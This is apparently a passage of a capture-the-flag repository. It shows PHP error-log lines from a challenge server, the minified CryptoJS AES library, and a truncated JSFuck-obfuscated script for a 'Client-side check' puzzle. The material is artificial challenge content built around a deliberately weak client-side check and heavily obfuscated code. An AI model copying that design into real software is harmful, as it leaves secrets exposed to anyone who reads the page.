44 | [02-Nov-2020 11:24:40 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
45 | [02-Nov-2020 11:24:43 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
46 | [02-Nov-2020 11:24:43 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
47 | [02-Nov-2020 11:25:04 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
48 | [02-Nov-2020 11:25:04 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
49 | [02-Nov-2020 11:25:14 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
50 | [02-Nov-2020 11:25:14 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
51 | [02-Nov-2020 11:25:40 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
52 | [02-Nov-2020 11:25:40 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
53 | [02-Nov-2020 11:26:03 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
54 | [02-Nov-2020 11:26:03 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
55 | [02-Nov-2020 11:26:10 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
56 | [02-Nov-2020 11:26:10 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
57 | [02-Nov-2020 11:29:09 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
58 | [02-Nov-2020 11:29:09 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
59 | [02-Nov-2020 11:29:52 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
60 | [02-Nov-2020 11:29:52 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
61 | [02-Nov-2020 11:31:05 Asia/Ho_Chi_Minh] PHP Notice:  Undefined index: is_admin in /home/nhienitc/public_html/chall3/index.php on line 8
62 | [02-Nov-2020 11:31:05 Asia/Ho_Chi_Minh] PHP Notice:  Undefined variable: flag in /home/nhienitc/public_html/chall3/index.php on line 21
63 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Client-side check/chall/aes.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | CryptoJS v3.1.2
 3 | code.google.com/p/crypto-js
 4 | (c) 2009-2013 by Jeff Mott. All rights reserved.
 5 | code.google.com/p/crypto-js/wiki/License
 6 | */
 7 | var CryptoJS=CryptoJS||function(u,p){var d={},l=d.lib={},s=function(){},t=l.Base={extend:function(a){s.prototype=this;var c=new s;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},
 8 | r=l.WordArray=t.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=p?c:4*a.length},toString:function(a){return(a||v).stringify(this)},concat:function(a){var c=this.words,e=a.words,j=this.sigBytes;a=a.sigBytes;this.clamp();if(j%4)for(var k=0;k<a;k++)c[j+k>>>2]|=(e[k>>>2]>>>24-8*(k%4)&255)<<24-8*((j+k)%4);else if(65535<e.length)for(k=0;k<a;k+=4)c[j+k>>>2]=e[k>>>2];else c.push.apply(c,e);this.sigBytes+=a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<
 9 | 32-8*(c%4);a.length=u.ceil(c/4)},clone:function(){var a=t.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],e=0;e<a;e+=4)c.push(4294967296*u.random()|0);return new r.init(c,a)}}),w=d.enc={},v=w.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var e=[],j=0;j<a;j++){var k=c[j>>>2]>>>24-8*(j%4)&255;e.push((k>>>4).toString(16));e.push((k&15).toString(16))}return e.join("")},parse:function(a){for(var c=a.length,e=[],j=0;j<c;j+=2)e[j>>>3]|=parseInt(a.substr(j,
10 | 2),16)<<24-4*(j%8);return new r.init(e,c/2)}},b=w.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var e=[],j=0;j<a;j++)e.push(String.fromCharCode(c[j>>>2]>>>24-8*(j%4)&255));return e.join("")},parse:function(a){for(var c=a.length,e=[],j=0;j<c;j++)e[j>>>2]|=(a.charCodeAt(j)&255)<<24-8*(j%4);return new r.init(e,c)}},x=w.Utf8={stringify:function(a){try{return decodeURIComponent(escape(b.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return b.parse(unescape(encodeURIComponent(a)))}},
11 | q=l.BufferedBlockAlgorithm=t.extend({reset:function(){this._data=new r.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=x.parse(a));this._data.concat(a);this._nDataBytes+=a.sigBytes},_process:function(a){var c=this._data,e=c.words,j=c.sigBytes,k=this.blockSize,b=j/(4*k),b=a?u.ceil(b):u.max((b|0)-this._minBufferSize,0);a=b*k;j=u.min(4*a,j);if(a){for(var q=0;q<a;q+=k)this._doProcessBlock(e,q);q=e.splice(0,a);c.sigBytes-=j}return new r.init(q,j)},clone:function(){var a=t.clone.call(this);
12 | a._data=this._data.clone();return a},_minBufferSize:0});l.Hasher=q.extend({cfg:t.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){q.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(b,e){return(new a.init(e)).finalize(b)}},_createHmacHelper:function(a){return function(b,e){return(new n.HMAC.init(a,
13 | e)).finalize(b)}}});var n=d.algo={};return d}(Math);
14 | (function(){var u=CryptoJS,p=u.lib.WordArray;u.enc.Base64={stringify:function(d){var l=d.words,p=d.sigBytes,t=this._map;d.clamp();d=[];for(var r=0;r<p;r+=3)for(var w=(l[r>>>2]>>>24-8*(r%4)&255)<<16|(l[r+1>>>2]>>>24-8*((r+1)%4)&255)<<8|l[r+2>>>2]>>>24-8*((r+2)%4)&255,v=0;4>v&&r+0.75*v<p;v++)d.push(t.charAt(w>>>6*(3-v)&63));if(l=t.charAt(64))for(;d.length%4;)d.push(l);return d.join("")},parse:function(d){var l=d.length,s=this._map,t=s.charAt(64);t&&(t=d.indexOf(t),-1!=t&&(l=t));for(var t=[],r=0,w=0;w<
15 | l;w++)if(w%4){var v=s.indexOf(d.charAt(w-1))<<2*(w%4),b=s.indexOf(d.charAt(w))>>>6-2*(w%4);t[r>>>2]|=(v|b)<<24-8*(r%4);r++}return p.create(t,r)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="}})();
16 | (function(u){function p(b,n,a,c,e,j,k){b=b+(n&a|~n&c)+e+k;return(b<<j|b>>>32-j)+n}function d(b,n,a,c,e,j,k){b=b+(n&c|a&~c)+e+k;return(b<<j|b>>>32-j)+n}function l(b,n,a,c,e,j,k){b=b+(n^a^c)+e+k;return(b<<j|b>>>32-j)+n}function s(b,n,a,c,e,j,k){b=b+(a^(n|~c))+e+k;return(b<<j|b>>>32-j)+n}for(var t=CryptoJS,r=t.lib,w=r.WordArray,v=r.Hasher,r=t.algo,b=[],x=0;64>x;x++)b[x]=4294967296*u.abs(u.sin(x+1))|0;r=r.MD5=v.extend({_doReset:function(){this._hash=new w.init([1732584193,4023233417,2562383102,271733878])},
17 | _doProcessBlock:function(q,n){for(var a=0;16>a;a++){var c=n+a,e=q[c];q[c]=(e<<8|e>>>24)&16711935|(e<<24|e>>>8)&4278255360}var a=this._hash.words,c=q[n+0],e=q[n+1],j=q[n+2],k=q[n+3],z=q[n+4],r=q[n+5],t=q[n+6],w=q[n+7],v=q[n+8],A=q[n+9],B=q[n+10],C=q[n+11],u=q[n+12],D=q[n+13],E=q[n+14],x=q[n+15],f=a[0],m=a[1],g=a[2],h=a[3],f=p(f,m,g,h,c,7,b[0]),h=p(h,f,m,g,e,12,b[1]),g=p(g,h,f,m,j,17,b[2]),m=p(m,g,h,f,k,22,b[3]),f=p(f,m,g,h,z,7,b[4]),h=p(h,f,m,g,r,12,b[5]),g=p(g,h,f,m,t,17,b[6]),m=p(m,g,h,f,w,22,b[7]),
18 | f=p(f,m,g,h,v,7,b[8]),h=p(h,f,m,g,A,12,b[9]),g=p(g,h,f,m,B,17,b[10]),m=p(m,g,h,f,C,22,b[11]),f=p(f,m,g,h,u,7,b[12]),h=p(h,f,m,g,D,12,b[13]),g=p(g,h,f,m,E,17,b[14]),m=p(m,g,h,f,x,22,b[15]),f=d(f,m,g,h,e,5,b[16]),h=d(h,f,m,g,t,9,b[17]),g=d(g,h,f,m,C,14,b[18]),m=d(m,g,h,f,c,20,b[19]),f=d(f,m,g,h,r,5,b[20]),h=d(h,f,m,g,B,9,b[21]),g=d(g,h,f,m,x,14,b[22]),m=d(m,g,h,f,z,20,b[23]),f=d(f,m,g,h,A,5,b[24]),h=d(h,f,m,g,E,9,b[25]),g=d(g,h,f,m,k,14,b[26]),m=d(m,g,h,f,v,20,b[27]),f=d(f,m,g,h,D,5,b[28]),h=d(h,f,
19 | m,g,j,9,b[29]),g=d(g,h,f,m,w,14,b[30]),m=d(m,g,h,f,u,20,b[31]),f=l(f,m,g,h,r,4,b[32]),h=l(h,f,m,g,v,11,b[33]),g=l(g,h,f,m,C,16,b[34]),m=l(m,g,h,f,E,23,b[35]),f=l(f,m,g,h,e,4,b[36]),h=l(h,f,m,g,z,11,b[37]),g=l(g,h,f,m,w,16,b[38]),m=l(m,g,h,f,B,23,b[39]),f=l(f,m,g,h,D,4,b[40]),h=l(h,f,m,g,c,11,b[41]),g=l(g,h,f,m,k,16,b[42]),m=l(m,g,h,f,t,23,b[43]),f=l(f,m,g,h,A,4,b[44]),h=l(h,f,m,g,u,11,b[45]),g=l(g,h,f,m,x,16,b[46]),m=l(m,g,h,f,j,23,b[47]),f=s(f,m,g,h,c,6,b[48]),h=s(h,f,m,g,w,10,b[49]),g=s(g,h,f,m,
20 | E,15,b[50]),m=s(m,g,h,f,r,21,b[51]),f=s(f,m,g,h,u,6,b[52]),h=s(h,f,m,g,k,10,b[53]),g=s(g,h,f,m,B,15,b[54]),m=s(m,g,h,f,e,21,b[55]),f=s(f,m,g,h,v,6,b[56]),h=s(h,f,m,g,x,10,b[57]),g=s(g,h,f,m,t,15,b[58]),m=s(m,g,h,f,D,21,b[59]),f=s(f,m,g,h,z,6,b[60]),h=s(h,f,m,g,C,10,b[61]),g=s(g,h,f,m,j,15,b[62]),m=s(m,g,h,f,A,21,b[63]);a[0]=a[0]+f|0;a[1]=a[1]+m|0;a[2]=a[2]+g|0;a[3]=a[3]+h|0},_doFinalize:function(){var b=this._data,n=b.words,a=8*this._nDataBytes,c=8*b.sigBytes;n[c>>>5]|=128<<24-c%32;var e=u.floor(a/
21 | 4294967296);n[(c+64>>>9<<4)+15]=(e<<8|e>>>24)&16711935|(e<<24|e>>>8)&4278255360;n[(c+64>>>9<<4)+14]=(a<<8|a>>>24)&16711935|(a<<24|a>>>8)&4278255360;b.sigBytes=4*(n.length+1);this._process();b=this._hash;n=b.words;for(a=0;4>a;a++)c=n[a],n[a]=(c<<8|c>>>24)&16711935|(c<<24|c>>>8)&4278255360;return b},clone:function(){var b=v.clone.call(this);b._hash=this._hash.clone();return b}});t.MD5=v._createHelper(r);t.HmacMD5=v._createHmacHelper(r)})(Math);
22 | (function(){var u=CryptoJS,p=u.lib,d=p.Base,l=p.WordArray,p=u.algo,s=p.EvpKDF=d.extend({cfg:d.extend({keySize:4,hasher:p.MD5,iterations:1}),init:function(d){this.cfg=this.cfg.extend(d)},compute:function(d,r){for(var p=this.cfg,s=p.hasher.create(),b=l.create(),u=b.words,q=p.keySize,p=p.iterations;u.length<q;){n&&s.update(n);var n=s.update(d).finalize(r);s.reset();for(var a=1;a<p;a++)n=s.finalize(n),s.reset();b.concat(n)}b.sigBytes=4*q;return b}});u.EvpKDF=function(d,l,p){return s.create(p).compute(d,
23 | l)}})();
24 | CryptoJS.lib.Cipher||function(u){var p=CryptoJS,d=p.lib,l=d.Base,s=d.WordArray,t=d.BufferedBlockAlgorithm,r=p.enc.Base64,w=p.algo.EvpKDF,v=d.Cipher=t.extend({cfg:l.extend(),createEncryptor:function(e,a){return this.create(this._ENC_XFORM_MODE,e,a)},createDecryptor:function(e,a){return this.create(this._DEC_XFORM_MODE,e,a)},init:function(e,a,b){this.cfg=this.cfg.extend(b);this._xformMode=e;this._key=a;this.reset()},reset:function(){t.reset.call(this);this._doReset()},process:function(e){this._append(e);return this._process()},
25 | finalize:function(e){e&&this._append(e);return this._doFinalize()},keySize:4,ivSize:4,_ENC_XFORM_MODE:1,_DEC_XFORM_MODE:2,_createHelper:function(e){return{encrypt:function(b,k,d){return("string"==typeof k?c:a).encrypt(e,b,k,d)},decrypt:function(b,k,d){return("string"==typeof k?c:a).decrypt(e,b,k,d)}}}});d.StreamCipher=v.extend({_doFinalize:function(){return this._process(!0)},blockSize:1});var b=p.mode={},x=function(e,a,b){var c=this._iv;c?this._iv=u:c=this._prevBlock;for(var d=0;d<b;d++)e[a+d]^=
26 | c[d]},q=(d.BlockCipherMode=l.extend({createEncryptor:function(e,a){return this.Encryptor.create(e,a)},createDecryptor:function(e,a){return this.Decryptor.create(e,a)},init:function(e,a){this._cipher=e;this._iv=a}})).extend();q.Encryptor=q.extend({processBlock:function(e,a){var b=this._cipher,c=b.blockSize;x.call(this,e,a,c);b.encryptBlock(e,a);this._prevBlock=e.slice(a,a+c)}});q.Decryptor=q.extend({processBlock:function(e,a){var b=this._cipher,c=b.blockSize,d=e.slice(a,a+c);b.decryptBlock(e,a);x.call(this,
27 | e,a,c);this._prevBlock=d}});b=b.CBC=q;q=(p.pad={}).Pkcs7={pad:function(a,b){for(var c=4*b,c=c-a.sigBytes%c,d=c<<24|c<<16|c<<8|c,l=[],n=0;n<c;n+=4)l.push(d);c=s.create(l,c);a.concat(c)},unpad:function(a){a.sigBytes-=a.words[a.sigBytes-1>>>2]&255}};d.BlockCipher=v.extend({cfg:v.cfg.extend({mode:b,padding:q}),reset:function(){v.reset.call(this);var a=this.cfg,b=a.iv,a=a.mode;if(this._xformMode==this._ENC_XFORM_MODE)var c=a.createEncryptor;else c=a.createDecryptor,this._minBufferSize=1;this._mode=c.call(a,
28 | this,b&&b.words)},_doProcessBlock:function(a,b){this._mode.processBlock(a,b)},_doFinalize:function(){var a=this.cfg.padding;if(this._xformMode==this._ENC_XFORM_MODE){a.pad(this._data,this.blockSize);var b=this._process(!0)}else b=this._process(!0),a.unpad(b);return b},blockSize:4});var n=d.CipherParams=l.extend({init:function(a){this.mixIn(a)},toString:function(a){return(a||this.formatter).stringify(this)}}),b=(p.format={}).OpenSSL={stringify:function(a){var b=a.ciphertext;a=a.salt;return(a?s.create([1398893684,
29 | 1701076831]).concat(a).concat(b):b).toString(r)},parse:function(a){a=r.parse(a);var b=a.words;if(1398893684==b[0]&&1701076831==b[1]){var c=s.create(b.slice(2,4));b.splice(0,4);a.sigBytes-=16}return n.create({ciphertext:a,salt:c})}},a=d.SerializableCipher=l.extend({cfg:l.extend({format:b}),encrypt:function(a,b,c,d){d=this.cfg.extend(d);var l=a.createEncryptor(c,d);b=l.finalize(b);l=l.cfg;return n.create({ciphertext:b,key:c,iv:l.iv,algorithm:a,mode:l.mode,padding:l.padding,blockSize:a.blockSize,formatter:d.format})},
30 | decrypt:function(a,b,c,d){d=this.cfg.extend(d);b=this._parse(b,d.format);return a.createDecryptor(c,d).finalize(b.ciphertext)},_parse:function(a,b){return"string"==typeof a?b.parse(a,this):a}}),p=(p.kdf={}).OpenSSL={execute:function(a,b,c,d){d||(d=s.random(8));a=w.create({keySize:b+c}).compute(a,d);c=s.create(a.words.slice(b),4*c);a.sigBytes=4*b;return n.create({key:a,iv:c,salt:d})}},c=d.PasswordBasedCipher=a.extend({cfg:a.cfg.extend({kdf:p}),encrypt:function(b,c,d,l){l=this.cfg.extend(l);d=l.kdf.execute(d,
31 | b.keySize,b.ivSize);l.iv=d.iv;b=a.encrypt.call(this,b,c,d.key,l);b.mixIn(d);return b},decrypt:function(b,c,d,l){l=this.cfg.extend(l);c=this._parse(c,l.format);d=l.kdf.execute(d,b.keySize,b.ivSize,c.salt);l.iv=d.iv;return a.decrypt.call(this,b,c,d.key,l)}})}();
32 | (function(){for(var u=CryptoJS,p=u.lib.BlockCipher,d=u.algo,l=[],s=[],t=[],r=[],w=[],v=[],b=[],x=[],q=[],n=[],a=[],c=0;256>c;c++)a[c]=128>c?c<<1:c<<1^283;for(var e=0,j=0,c=0;256>c;c++){var k=j^j<<1^j<<2^j<<3^j<<4,k=k>>>8^k&255^99;l[e]=k;s[k]=e;var z=a[e],F=a[z],G=a[F],y=257*a[k]^16843008*k;t[e]=y<<24|y>>>8;r[e]=y<<16|y>>>16;w[e]=y<<8|y>>>24;v[e]=y;y=16843009*G^65537*F^257*z^16843008*e;b[k]=y<<24|y>>>8;x[k]=y<<16|y>>>16;q[k]=y<<8|y>>>24;n[k]=y;e?(e=z^a[a[a[G^z]]],j^=a[a[j]]):e=j=1}var H=[0,1,2,4,8,
33 | 16,32,64,128,27,54],d=d.AES=p.extend({_doReset:function(){for(var a=this._key,c=a.words,d=a.sigBytes/4,a=4*((this._nRounds=d+6)+1),e=this._keySchedule=[],j=0;j<a;j++)if(j<d)e[j]=c[j];else{var k=e[j-1];j%d?6<d&&4==j%d&&(k=l[k>>>24]<<24|l[k>>>16&255]<<16|l[k>>>8&255]<<8|l[k&255]):(k=k<<8|k>>>24,k=l[k>>>24]<<24|l[k>>>16&255]<<16|l[k>>>8&255]<<8|l[k&255],k^=H[j/d|0]<<24);e[j]=e[j-d]^k}c=this._invKeySchedule=[];for(d=0;d<a;d++)j=a-d,k=d%4?e[j]:e[j-4],c[d]=4>d||4>=j?k:b[l[k>>>24]]^x[l[k>>>16&255]]^q[l[k>>>
34 | 8&255]]^n[l[k&255]]},encryptBlock:function(a,b){this._doCryptBlock(a,b,this._keySchedule,t,r,w,v,l)},decryptBlock:function(a,c){var d=a[c+1];a[c+1]=a[c+3];a[c+3]=d;this._doCryptBlock(a,c,this._invKeySchedule,b,x,q,n,s);d=a[c+1];a[c+1]=a[c+3];a[c+3]=d},_doCryptBlock:function(a,b,c,d,e,j,l,f){for(var m=this._nRounds,g=a[b]^c[0],h=a[b+1]^c[1],k=a[b+2]^c[2],n=a[b+3]^c[3],p=4,r=1;r<m;r++)var q=d[g>>>24]^e[h>>>16&255]^j[k>>>8&255]^l[n&255]^c[p++],s=d[h>>>24]^e[k>>>16&255]^j[n>>>8&255]^l[g&255]^c[p++],t=
35 | d[k>>>24]^e[n>>>16&255]^j[g>>>8&255]^l[h&255]^c[p++],n=d[n>>>24]^e[g>>>16&255]^j[h>>>8&255]^l[k&255]^c[p++],g=q,h=s,k=t;q=(f[g>>>24]<<24|f[h>>>16&255]<<16|f[k>>>8&255]<<8|f[n&255])^c[p++];s=(f[h>>>24]<<24|f[k>>>16&255]<<16|f[n>>>8&255]<<8|f[g&255])^c[p++];t=(f[k>>>24]<<24|f[n>>>16&255]<<16|f[g>>>8&255]<<8|f[h&255])^c[p++];n=(f[n>>>24]<<24|f[g>>>16&255]<<16|f[h>>>8&255]<<8|f[k&255])^c[p++];a[b]=q;a[b+1]=s;a[b+2]=t;a[b+3]=n},keySize:8});u.AES=p._createHelper(d)})();
36 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Client-side check/chall/index.js:
--------------------------------------------------------------------------------
1 | [][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(!![]+[])[!![]+!![]+!![]]+([![]][+(+[]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]+[+[]]]+(![]+[])[+!![]]+(![]+[])[!![]+!![]])()((!![]+[+[]]+(+[])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+(+!![])+!![]+(+[])+![]+!![]+(+[])+!![]+![]+![]+!![]+(+[])+![]+!![]+![]+(!![]+!![])+![]+(+!![])+(+!![])+!![]+![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+!![]+(+[])+!![]+![]+(+!![])+(+[])+![]+(!![]+!![])+(+[])+(+!![])+![]+!![]+(+!![])+(+!![])+![]+(!![]+!![])+(+!![])+(+[])+![]+(!![]+!![])+![]+!![]+!![]+![]+!![]+(+[])+![]+(+!![])+(+[])+![]+(+!![])+!![]+(+[])+![]+(+!![])+(+[])+(+!![])+![]+!![]+(+[])+!![]+![]+(+!![])+!![]+![]+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+(+!![])+!![]+!![]+![]+![]+(!![]+!![])+(+!![])+![]+![]+!![]+(+[])+![]+!![]+![]+!![]+(+!![])+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+(!![]+!![])+(+!![])+![]+(+!![])+![]+(+!![])+(+[])+(+[])+(!![]+!![])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+![]+(!![]+!![])+(+!![])+![]+![]+!![]+(+[])+![]+!![]+![]+(!![]+!![])+![]+(+!![])+(+[])+!![]+![]+!![]+!![]+(+[])+![]+![]+(!![]+!![])+(+!![])+![]+![]+!![]+(+[])+![]+!![]+![]+(+!![])+(+[])+(+[])+(+!![])+![]+![]+(+!![])+(+!![])+!![]+![]+!![]+(+!![])+![]+(+!![])+!![]+(+[])+![]+(+!![])+(+!![])+![]+!![]+![]+(+!![])+!![]+!![]+![]+!![]+(+!![])+!![]+![]+!![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+(+!![])+!![]+(+[])+![]+!![]+(+[])+!![]+![]+![]+!![]+(+[])+![]+!![]+![]+(!![]+!![])+![]+(+!![])+(+!![])+(+[])+![]+![]+!![]+![]+(+!![])+(+[])+(!![]+!![])+![]+(+!![])+(+!![])+![]+![]+!![]+(+[])+!![]+![]+![]+!![]+(+[])+![]+!![]+![]+(+!![])+(+[])+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+(!![]+!![])+(!![]+!![])+![]+!![]+(+!![])+![]+!![]+(+[])+!![]+![]+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+(+!![])+![]+!![]+(+!![])+(+!![])+![]+(!![]+!![])+(+!![])+(+[])+![]+(!![]+!![])+![]+(!![]+!![])+(+!![])+![]+!![]+(+!![])+![]+(+!![])+(+!![])+![]+(+!![])+!![]+(+[])+![]+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(+!![])+(+[])+![]+!![]+![]+(+!![])+![]+(+!![])+(+[])+(+[])+(+[])+![]+![]+(!![]+!![])+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+!![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+!![]+![]+(+!![])+(+!![])+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+(+!![])+!![]+![]+(+!![])+(+!![])+(+!![])+![]+(!![]+!![])+![]+!![]+![]+!![]+!![]+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+(+[])+![]+(+!![])+(!![]+!![])+![]+(!![]+!![])+!![]+(+[])+![]+(+!![])+(!![]+!![])+![]+(!![]+!![])+(+[])+!![]+![]+(!![]+!![])+!![]+(+[])+![]+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+![]+!![]+![]+!![]+(+[])+(!![]+!![])+![]+!![]+(+[])+(!![]+!![])+![]+(!![]+!![])+(+[])+(+[])+![]+(+!![])+(+[])+(!![]+!![])+![]+(!![]+!![])+(+!![])+(!![]+!![])+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(+!![])+(+[])+![]+!![]+![]+(+!![])+![]+(+!![])+!![]+![]+(!![]+!![])+(+!![])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+!![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+!![]+![]+(+!![])+(+!![])+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+(+!![])+!![]+![]+(+!![])+(+!![])+(+!![])+![]+(!![]+!![])+![]+!![]+![]+!![]+!![]+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+(+[])+![]+(+!![])+(!![]+!![])+![]+(!![]+!![])+!![]+(+[])+![]+(+!![])+(!![]+!![])+![]+(!![]+!![])+(+[])+!![]+![]+(!![]+!![])+(+[])+(!![]+!![])+![]+!![]+(+!![])+![]+!![]+(+[])+(+[])+![]+!![]+(+[])+(+[])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+(+!![])+(+!![])+(+[])+![]+!![]+(+[])+(!![]+!![])+![]+!![]+(+[])+(!![]+!![])+![]+(!![]+!![])+(+[])+!![]+![]+(!![]+!![])+(+[])+!![]+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+![]+!![]+(+[])+![]+(+!![])+(+!![])+(+[])+![]+!![]+![]+(!![]+!![])+!![]+!![]+![]+(+!![])+![]+(+!![])+!![]+(!![]+!![])+![]+(+!![])+![]+!![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(!![]+!![])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+!![]+!![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+!![])+(+!![])+![]+(+!![])+![]+!![]+(!![]+!![])+(+!![])+![]+(+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(+!![])+![]+!![]+(+!![])+(!![]+!![])+![]+(+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(!![]+!![])+![]+!![]+!![]+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+!![]+![]+(!![]+!![])+(+!![])+(+!![])+![]+!![]+!![]+(+[])+![]+!![